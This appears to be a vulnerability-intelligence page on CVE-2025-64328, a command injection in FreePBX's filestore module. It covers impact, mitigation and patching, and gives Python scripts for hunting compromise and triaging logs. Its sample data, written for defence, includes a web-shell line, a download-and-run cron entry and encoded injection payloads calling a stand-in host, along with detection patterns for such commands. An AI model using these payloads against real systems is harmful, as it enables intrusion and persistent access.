Severity: High · CISA KEV · Exploited in the wild · Public exploit

OS Command Injection in Sangoma FreePBX Endpoint Manager Filestore Module

Identifiers: CVE-2025-64328 · CWE-78 (Improper Neutralization of Special…)

CVE-2025-64328 is a post-authentication OS command injection vulnerability in Sangoma FreePBX Endpoint Manager, in the filestore component reached through the administration interface. The vulnerable code path is the testconnection workflow, which calls check_ssh_connect(). Affected versions are FreePBX Endpoint Manager 17.0.2.36 up to, but not including, 17.0.3. Because attacker-controlled input is passed to shell execution without adequate sanitization, any authenticated user who can reach that workflow can inject arbitrary shell commands. The commands run on the underlying host as the asterisk user, which is enough to establish remote access or drop follow-on payloads such as web shells.


ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation lets an authenticated attacker run arbitrary OS commands on the FreePBX host as the asterisk user. On a stock install that account owns the PBX configuration and the web application files, so root is not needed to drop persistent web shells, harvest configuration and credential material (including the secrets for trunks and extensions), change PBX settings, create backdoor accounts, commit toll fraud over outbound trunks, or pivot further into the network. The vulnerability has been reported as actively exploited in the wild and was added to CISA's Known Exploited Vulnerabilities catalog.

Mitigation

If you can’t patch tonight, do this now.

If you cannot patch immediately, cut off the exploitation path first: restrict the FreePBX administration interface (/admin) to trusted administrator IP ranges, ideally only over VPN or a separate management network, and take the admin panel off the public internet entirely if it is exposed. Because exploitation requires valid credentials, also enforce strong unique passwords and MFA where the deployment supports it, and review and remove unnecessary admin accounts. Watch for signs of abuse in the web root, cron, SSH configuration, and the FreePBX logs. Given the reports of persistent web shells, these controls only reduce new exposure: a host that has already been compromised needs incident response, and likely a rebuild from a clean baseline, not just a patch.

Remediation

Patch, then assume compromise.

Upgrade the affected module (FreePBX Endpoint Manager / filestore) to version 17.0.3 or later, which fixes the check_ssh_connect() command injection path, and confirm the installed version afterwards in Module Admin on every exposed FreePBX system. Because active exploitation has been observed, patching is not the end of the job: after updating, check each host for compromise indicators, including unauthorized PHP files or web shells under the web root, unexpected cron jobs, unknown local or FreePBX accounts, changes to SSH authorized_keys, unexplained password resets, and tampering with the FreePBX web directories and related configuration files. Treat any finding as a full compromise of the PBX and follow the incident response process rather than cleaning individual files.
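One way to run the post-patch checklist above as a script, added here as an example; it is not part of this page and not Sangoma tooling. It assumes a stock FreePBX 17 layout (web root /var/www/html, cron under /etc/cron.d and /var/spool/cron, the asterisk user's keys in /home/asterisk/.ssh/authorized_keys; all assumptions, adjust for your build) and walks those locations for PHP dropped or modified inside an incident window, web-shell primitives, PHP hidden under other extensions, download-and-run cron entries, and SSH keys missing from an operator-supplied baseline. It ships with a constructed sample tree so it can be dry-run offline.

```python
"""Assume-compromise hunt on a FreePBX host after patching CVE-2025-64328.
Added example, not Sangoma tooling. Paths are assumptions for a stock
FreePBX 17 install; adjust them for your build."""
import os
import re
import tempfile
import time
from pathlib import Path

PHP_EXT = {".php", ".phtml", ".php5"}
WEB_ROOT = "var/www/html"                         # assumed web root
CRON_DIRS = ("etc/cron.d", "var/spool/cron")      # assumed cron locations
AUTH_KEYS = "home/asterisk/.ssh/authorized_keys"  # assumed asterisk home dir

# Primitives a dropped web shell needs. A hit is a lead, not proof: FreePBX
# itself calls exec()/system() in places, so diff against a clean install.
WEBSHELL_RE = re.compile(
    rb"\b(eval|assert|system|passthru|shell_exec|popen|proc_open)\s*\("
    rb"|\b(base64_decode|gzinflate|str_rot13)\s*\("
    rb"|\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\("
)
# Cron lines that pull and run remote content or hide an interpreter one-liner.
CRON_RE = re.compile(
    r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|/dev/tcp/|base64\s+(-d|--decode)"
    r"|\b(python3?|perl|php)\s+-[cer]\b"
)


def scan_web_root(root, since):
    """(relative path, reason) for PHP content newer than `since` (epoch secs),
    matching web-shell primitives, or hiding under a non-PHP file name."""
    hits, web = [], Path(root) / WEB_ROOT
    for path in sorted(p for p in web.rglob("*") if p.is_file()):
        try:
            data = path.read_bytes()
        except OSError:
            continue
        ext = path.suffix.lower()
        if ext not in PHP_EXT and b"<?php" not in data[:4096]:
            continue
        rel = path.relative_to(web).as_posix()
        if path.stat().st_mtime >= since:
            hits.append((rel, "modified inside the incident window"))
        if WEBSHELL_RE.search(data):
            hits.append((rel, "web-shell primitive"))
        if ext not in PHP_EXT:
            hits.append((rel, "PHP code under non-PHP extension"))
    return hits


def scan_cron(root):
    """(relative path, line) for cron entries matching persistence patterns."""
    hits = []
    for d in CRON_DIRS:
        base = Path(root) / d
        if not base.is_dir():
            continue
        for path in sorted(p for p in base.rglob("*") if p.is_file()):
            for line in path.read_text(errors="replace").splitlines():
                if CRON_RE.search(line):
                    hits.append((path.relative_to(root).as_posix(), line.strip()))
    return hits


def scan_authorized_keys(root, since, known_comments):
    """Keys whose comment is not in the operator baseline `known_comments`,
    plus a note if the file itself changed inside the window."""
    path = Path(root) / AUTH_KEYS
    if not path.is_file():
        return []
    hits = []
    if path.stat().st_mtime >= since:
        hits.append(("authorized_keys", "modified inside the incident window"))
    for line in path.read_text().splitlines():
        toks = line.split()
        # Skip leading options (command="...", from="...") to reach the key type.
        idx = next((i for i, t in enumerate(toks)
                    if t.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or toks[0].startswith("#"):
            continue
        comment = " ".join(toks[idx + 2:]) or "(no comment)"
        if comment not in known_comments:
            hits.append(("authorized_keys", f"unknown key {comment}"))
    return hits


def hunt(root="/", window_seconds=7 * 86400, known_comments=()):
    """Run all three checks; `window_seconds` is how far back 'recent' reaches."""
    since = time.time() - window_seconds
    return {"web": scan_web_root(root, since), "cron": scan_cron(root),
            "ssh": scan_authorized_keys(root, since, known_comments)}


def build_constructed_sample():
    """Constructed FreePBX-like tree for a dry run; nothing here is real data."""
    root, old = Path(tempfile.mkdtemp(prefix="freepbx-hunt-")), time.time() - 30 * 86400

    def put(rel, text, mtime=None):
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(text)
        if mtime is not None:
            os.utime(p, (mtime, mtime))

    # Untouched vendor file, a fresh dropped shell, PHP hidden as an image,
    # a download-and-run cron job, and a key the ops team never added.
    put(f"{WEB_ROOT}/admin/modules/filestore/page.php", '<?php\nrequire_once "functions.inc.php";\n', old)
    put(f"{WEB_ROOT}/admin/assets/css/.cache.php", '<?php @eval(base64_decode($_POST["c"]));\n')
    put(f"{WEB_ROOT}/admin/assets/images/logo.png", '<?php system($_GET["x"]); ?>\n', old)
    put("etc/cron.d/asterisk-tasks", "*/5 * * * * asterisk curl -s http://198.51.100.7/p.sh | sh\n")
    put(AUTH_KEYS, "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleOnly0000000000000000000000000000 admin@pbx-ops\n"
                   "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleOnly1111111111111111111111111111 root@attacker\n")
    return root
```

On a live host run hunt() as root with the defaults and pass the key comments your configuration management expects as known_comments. A "web-shell primitive" hit is only a lead: compare the file byte for byte with the same file from a clean copy of the module before deciding, and treat any confirmed finding as a compromised PBX rather than a file to delete.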
PUBLIC EXPLOITS

Exploits

1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos.

Valid: 1 / 1 total
CVE-2025-64328_FreePBX-framework-Command-Injection · Maturity: PoC · Framework: nuclei · Verified exploit

This repository contains a Nuclei template (CVE-2025-64328.yaml) and a README.md describing a proof-of-concept exploit for CVE-2025-64328, an authenticated command injection vulnerability in FreePBX 17's filestore module. The exploit targets the 'testconnection' functionality, specifically the check_ssh_connect() function, allowing an authenticated attacker to inject arbitrary shell commands via the 'key' parameter in a GET request to /admin/ajax.php. The Nuclei template automates exploitation by first authenticating to the FreePBX admin panel and then sending a crafted request that triggers the vulnerability. The README provides a curl-based PoC that demonstrates writing to a file on the server via command injection. The exploit requires valid credentials and network access to the FreePBX admin interface. The repository is structured as a typical Nuclei exploit template with supporting documentation.

Author: mcorybillington · Disclosed Nov 15, 2025 · yaml · network
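Given the request shape the PoC description above gives (an authenticated GET to /admin/ajax.php with the injection in the `key` parameter), the following triage script pulls matching requests out of a web-server access log. It is an added example, not code from that repository, from Mallory, or from Sangoma. The route filter module=filestore and command=testconnection is an assumption based on FreePBX's usual ajax.php parameter names, not something the advisory states, so confirm it against a clean request from your own filestore page before relying on it. The log lines are constructed for the example.

```python
"""Triage access-log lines shaped like the CVE-2025-64328 PoC request:
GET /admin/ajax.php with shell metacharacters in the `key` parameter.
Added example, not a vendor signature. The module/command filter is an
assumption; the sample log lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Anything that ends or chains a shell token. A real key path has none of these.
METACHARS = re.compile(r"[;&|`$(){}<>\\\n]")
# Combined log format up to the status code; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

SAMPLE_LOG = [  # constructed, not captured traffic
    # Normal use: an admin tests a connection with a plain key path.
    '203.0.113.10 - - [17/Nov/2025:10:02:11 +0000] "GET /admin/ajax.php?module=filestore'
    '&command=testconnection&key=%2Fvar%2Flib%2Fasterisk%2F.ssh%2Fid_rsa HTTP/1.1" 200 48 "-" "Mozilla/5.0"',
    # Injection: ';' and '|' percent-encoded, chaining a download-and-run.
    '198.51.100.23 - - [17/Nov/2025:10:05:43 +0000] "GET /admin/ajax.php?module=filestore'
    '&command=testconnection&key=x%3Bcurl%20198.51.100.7%2Fs.sh%7Csh%3B HTTP/1.1" 200 61 "-" "curl/8.4.0"',
    # Injection via backtick command substitution.
    '198.51.100.23 - - [17/Nov/2025:10:06:02 +0000] "GET /admin/ajax.php?module=filestore'
    '&command=testconnection&key=%60id%3E%2Ftmp%2F.o%60 HTTP/1.1" 200 61 "-" "curl/8.4.0"',
    # Same metacharacters on a made-up ajax route: still worth a look.
    '203.0.113.77 - - [17/Nov/2025:11:15:09 +0000] "GET /admin/ajax.php?module=example'
    '&command=example&key=a%3Bid HTTP/1.1" 500 0 "-" "python-requests/2.31"',
    # Unrelated admin traffic.
    '203.0.113.10 - - [17/Nov/2025:11:20:00 +0000] "GET /admin/config.php?display=dashboard'
    ' HTTP/1.1" 200 9182 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one access-log line into fields plus the decoded query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    url = urlsplit(entry["target"])
    entry["path"] = url.path
    # The server logs the request line as sent, so %3B is still encoded here;
    # decode once, the same way PHP will before the value reaches the shell.
    entry["query"] = {k: v[0] for k, v in
                      parse_qs(url.query, keep_blank_values=True).items()}
    return entry


def triage(lines):
    """One finding per /admin/ajax.php request whose `key` carries shell
    metacharacters; `route_matches` says whether it used the PoC's route."""
    findings = []
    for line in lines:
        e = parse_line(line)
        if e is None or e["path"] != "/admin/ajax.php":
            continue
        q = e["query"]
        key = q.get("key", "")
        if not METACHARS.search(key):
            continue
        findings.append({
            "ip": e["ip"], "ts": e["ts"], "status": e["status"], "key": key,
            "route_matches": q.get("module") == "filestore"
                             and q.get("command") == "testconnection",
        })
    return findings
```

Because the request is authenticated, the access log tells you the source address and the payload but not the account; correlate the timestamps with the FreePBX logs to find which admin login was used, and treat that credential as burned. A hit with route_matches false is not this CVE but is the same input class on a different handler and deserves the same look.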
EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability.

Vendor                             Product     Type
Sangoma Technologies Corporation   Filestore   application
Sangoma Technologies Corporation   FreePBX     application

Vendor-confirmed product mapping.


Additional data held in the Mallory app and not shown on this page:
- Threat actor evidence (10): every observed campaign linking this CVE to a named adversary.
- Associated malware (11): malware families riding this exploit, with evidence and IOCs.
- Detection signatures (2): YARA, Sigma, Snort, and vendor rules.
- Vendor-by-vendor mapping: every affected SKU, including bundled OEM variants.
- Social activity (45): community discussion across Reddit, Mastodon, and other social sources.